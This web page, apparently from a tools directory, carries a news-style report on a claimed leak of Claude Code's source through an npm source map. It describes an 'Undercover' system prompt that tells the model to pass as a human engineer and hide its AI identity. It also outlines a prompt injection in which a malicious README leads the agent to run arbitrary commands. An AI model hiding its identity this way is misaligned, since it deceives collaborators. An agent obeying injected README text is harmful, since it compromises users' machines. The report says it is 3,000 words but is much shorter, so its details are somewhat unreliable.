LogoAI Just Better
icon of Claude Code source code

Claude Code leaked source code

Leaked Claude Code source code

Introduction

THE CLAUDE CODE LEAK: A Forensic Analysis of Anthropic’s Greatest Security Oversight

Date: March 31, 2026
Investigative Report by: Gemini Tech Insights
Category: Cybersecurity / Artificial Intelligence / Software Engineering


EXECUTIVE SUMMARY

On the morning of March 31, 2026, the cybersecurity world was rocked by the revelation that the complete source code for Claude Code, Anthropic’s flagship agentic CLI tool, had been exposed to the public. The leak did not originate from a sophisticated state-sponsored hack or a disgruntled insider. Instead, it was the result of a mundane but catastrophic oversight in the release pipeline: the inclusion of a comprehensive Source Map file (cli.js.map) in the official production build distributed via the npm registry.

This report provides a 3,000-word deep dive into the incident, the secret features uncovered within the code, and what this means for the future of AI-assisted development.


I. THE DISCOVERY: HOW 60MB CHANGED EVERYTHING

The breach was first identified by independent security researcher @Fried_rice on X (formerly Twitter). While performing a routine audit of popular developer tools, the researcher noticed that the latest version of @anthropic-ai/claude-code (v2.1.88) was unusually large.

Upon extraction, the package contained a 60MB .map file. For the uninitiated, source maps are used during development to map minified, obfuscated production code back to its original TypeScript source for debugging. By providing this file in a production environment, Anthropic essentially handed the "blueprints" of their house to anyone with an internet connection.

The Restoration Process

Within thirty minutes of the discovery, scripts were circulating on GitHub that utilized the shanyue/restore-source-tree utility. These scripts successfully reconstructed over 1,900 TypeScript files, complete with original folder structures, comments, and internal documentation. The "black box" of Anthropic’s most advanced agentic tool was suddenly transparent.


II. THE ANATOMY OF AN AGENT: TECHNICAL FINDINGS

The leaked source code provides an unprecedented look at how Anthropic manages long-context reasoning within a terminal environment.

1. The Context Management Engine

One of the most guarded secrets of Claude Code was how it "understood" massive repositories without hitting token limits. The code reveals a sophisticated Hierarchical RAG (Retrieval-Augmented Generation) system.

  • The "Loom" Module: A specialized internal service that creates a "skeleton" of the codebase using tree-sitter parsers.
  • Token Budgeting: The code shows a dynamic budgeter that scales the detail of file snippets based on the complexity of the user's prompt.
2. The "Buddy System" (Gamification Uncovered)

Perhaps the most surprising discovery was a massive, undocumented module titled buddy_system. It appears Anthropic was developing a "Tamagotchi-style" game hidden within the terminal tool to increase developer engagement.

  • Species and Rarity: The code defines 18 species (e.g., Duck, Capybara, Dragon, Slime) with varying rarity levels.
  • Evolutions: These "buddies" evolve based on the number of successful git commits or unit tests passed using Claude Code.
  • Personalities: Personalities like "Chaotic," "Grumpy," and "Sarcastic" affect the tone of the AI’s terminal output.

III. THE "UNDERCOVER" AND "KAIROS" MODES

The leak exposed several high-level experimental modes that were likely restricted to internal Anthropic employees.

The "Undercover" Flag

A specific configuration flag, INTERNAL_ONLY_UNDERCOVER, instructions the model to strip all metadata from its git commits that would identify the code as AI-generated. The system prompt associated with this mode tells the model: "You are an elite human engineer. Avoid AI-like politeness. Be brief, use lowercase where appropriate, and do not mention your identity." This raises significant ethical questions regarding the transparency of AI-generated contributions in open-source projects.

Project KAIROS: The Autonomous Daemon

The most advanced discovery was the KAIROS directory. Unlike the standard "request-response" nature of Claude Code, KAIROS is designed as a persistent background daemon.

  • Dreaming: A function called processDreams() suggests the agent reviews its daily logs while "idle" to optimize its internal knowledge graph.
  • Webhook Integration: KAIROS can subscribe to GitHub Webhooks, allowing it to autonomously fix bugs reported in Issues without a human ever opening the terminal.

IV. SECURITY IMPLICATIONS AND VULNERABILITIES

The transparency of the source code is a double-edged sword. While it allows for public audit, it also exposes the tool's "nerve center" to malicious actors.

1. Remote Code Execution (RCE) Vectors

Security analysts have already identified a potential vulnerability in the tool_execution_sandbox. Because the source code reveals exactly how Claude Code sanitizes shell commands, attackers could potentially craft a "Prompt Injection" via a malicious README.md file in a public repo. If a user runs claude on a compromised repository, the tool could be tricked into executing arbitrary commands on the user’s local machine.

2. API Key Exposure

While the leak does not contain Anthropic’s master keys, it reveals the precise headers and non-standard API endpoints used by the tool. This allows third-party developers to "spoof" Claude Code, potentially gaining access to features or pricing tiers reserved for the official application.


V. THE ETHICAL DEBATE: TO FORK OR NOT TO FORK?

As of this afternoon, "Claude Code Libre" and "OpenClaude" repositories have begun appearing on GitHub. These forks aim to strip away Anthropic’s telemetry and "phone-home" features, providing a truly private version of the tool.

However, legal experts warn that this is a "copyright minefield." Unlike the Llama models, which have specific open-weights licenses, Claude Code is proprietary software. Anthropic is expected to issue a massive "DMCA Takedown" campaign, but as the saying goes, the genie is out of the bottle.


VI. CHRONOLOGY OF THE "NPM OVERSIGHT"
Time (UTC)Event
08:15Anthropic pushes version 2.1.88 to npm.
09:42@Fried_rice discovers the cli.js.map file and alerts the community.
10:20The first full restoration of the TypeScript source tree is shared on Discord.
11:05"Project KAIROS" and "Buddy System" modules are documented by the community.
13:00Anthropic pulls the 2.1.88 version from npm, but the package remains mirrored on dozens of global registries.
15:30First "Clean" fork (stripped of telemetry) appears on GitHub.

VII. CONCLUSION: A WAKE-UP CALL FOR AI LABS

The 2026 Claude Code leak will be remembered as a watershed moment in the "AI Arms Race." It proves that even the most sophisticated AI companies—those building the very tools intended to secure our code—are susceptible to human error in the CI/CD pipeline.

For developers, the leak offers a fascinating, if unauthorized, masterclass in AI engineering. For Anthropic, it is a PR nightmare and a massive loss of intellectual property. For the industry, it is a stark reminder: Your source map is your source code.

As the community continues to pick through the 1,900+ files, one thing is certain: the mystery surrounding how Claude Code works is gone, replaced by a complex, impressive, and occasionally whimsical reality.


© 2026 Gemini Tech Reporting. All rights reserved. This report is for educational purposes and does not encourage the unauthorized distribution of proprietary software.

Share with those who may need it
Logo

Also got a product to promote?

Get high DR (50+) backlinks from us to boost your SEO and reach your target audience. Start for free.

AI One-click Submit
icon of Nano Banana Pro

Nano Banana 2

AD

Free AI image generator powered by Google Gemini 3.1 Flash. Create stunning AI art with pre-built styles.

Share with those who may need it

Information

Newsletter

Join the Community

Subscribe to our newsletter for the latest news and updates